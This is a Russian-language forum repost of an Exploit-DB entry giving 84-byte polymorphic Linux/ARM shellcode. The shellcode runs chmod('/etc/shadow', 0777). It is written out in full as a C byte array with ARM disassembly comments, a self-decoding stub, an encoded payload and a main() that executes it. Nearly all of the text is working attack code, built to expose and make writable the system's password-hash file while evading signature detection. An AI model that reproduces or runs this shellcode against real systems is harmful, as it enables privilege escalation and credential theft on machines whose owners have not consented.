Exploit Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14142
Проверка EDB
  1. Пройдено
Автор
FLORIAN GAULTIER
Тип уязвимости
SHELLCODE
Платформа
ARM
CVE
N/A
Дата публикации
2010-06-30
C:
/*
 | Title:    Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
 | Type:     Shellcode
 | Author:   Florian Gaultier <[email protected]>
 | Platform: Linux ARM (ARM926EJ-S rev 5 (v51))
 | [+]       http://www.shell-storm.org
*/


#include <stdio.h>


char shellcode[] =
"\x24\x60\x8f\xe2"     //add r6, pc, #36
"\x16\xff\x2f\xe1"     //bx r6
"\xde\x40\xa0\xe3"     //mov r4, #222
"\x01\x0c\x54\xe3"     //cmp r4, #256
"\x1e\xff\x2f\x81"     //bxhi lr
"\xde\x40\x44\xe2"     //sub r4, r4, #222
"\x04\x50\xde\xe7"     //ldrb r5, [lr, r4]
"\x02\x50\x85\xe2"     //add r5, r5, #2 (add 2 at every shellcode's byte)
"\x04\x50\xce\xe7"     //strb r5, [lr, r4]
"\xdf\x40\x84\xe2"     //add r4, r4, #223
"\xf7\xff\xff\xea"     //b 8078
"\xf5\xff\xff\xeb"     //bl 8074
//shellcode crypted
"\xff\x5e\x8d\xe0"
"\x14\xfd\x2d\xdf"
"\x76\x44"
"\x0a\x2e"
"\xfd\x1f"
"\xfd\x2f"
"\x0d\x25"
"\xff\xdd"
"\xff\x25"
"\xff\xdd"
"-cra-qf_bmu";


int main()
{
        (*(void(*)()) shellcode)();

return 0;
}
 
Источник
www.exploit-db.com

Похожие темы